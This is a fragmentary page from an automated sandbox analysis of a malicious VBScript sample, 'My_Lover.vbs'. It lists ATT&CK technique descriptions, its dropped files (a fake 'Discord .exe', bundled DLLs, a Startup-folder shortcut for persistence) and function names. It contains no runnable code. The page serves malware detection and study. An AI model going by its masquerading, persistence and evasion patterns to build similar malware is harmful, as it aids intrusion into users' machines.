Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 2708de1597061a8fa6ad51d78b15781e7825eafb6c465dc6797986b6e9ef03d5
Instruction ID: a1ef79f7f39010cafbfa0dcb5a12803e3228dcaea031dda2bae8e41fa1df20cd
Opcode Fuzzy Hash: 2708de1597061a8fa6ad51d78b15781e7825eafb6c465dc6797986b6e9ef03d5
Instruction Fuzzy Hash: 32F0D172501B029BCB00BFA9854921EBBF4FB82650F550428DD69E7301EB30A418CBC3

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report My_Lover.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Temp\8901m.jpg

C:\Users\user\AppData\Local\Temp\a.zip

C:\Users\user\AppData\Local\Temp\x.zip

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V3.lnk

C:\Users\user\Service\DFO1.dll

C:\Users\user\Service\DPUB1.dll

C:\Users\user\Service\DRES1.dll

C:\Users\user\Service\DSER1.dll

C:\Users\user\Service\Discord .exe

C:\Users\user\Service\desktop.ini

C:\Users\user\Service\libcrypto-3.dll

C:\Users\user\Service\libgcc_s_dw2-1.dll

C:\Users\user\Service\libssl.dll

C:\Users\user\Service\libstdc++-6.dll

C:\Users\user\Service\libwinpthread-1.dll

Static File Info

General

Windows Analysis Report
My_Lover.vbs

Function 6DE85DC0 Relevance: 61.6, APIs: 26, Strings: 9, Instructions: 372
sleepwindowCOMMON

Function 6DE8A200 Relevance: 52.9, APIs: 35, Instructions: 440
processstringwindowCOMMON

Function 00401179 Relevance: 18.2, APIs: 12, Instructions: 202
sleepstringCOMMON

Function 6DE8FD70 Relevance: 7.9, Strings: 6, Instructions: 376
COMMONCrypto

Function 6DE94DF0 Relevance: 4.5, APIs: 3, Instructions: 48
COMMON

Function 6DE94EB0 Relevance: 4.5, APIs: 3, Instructions: 48
COMMON

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre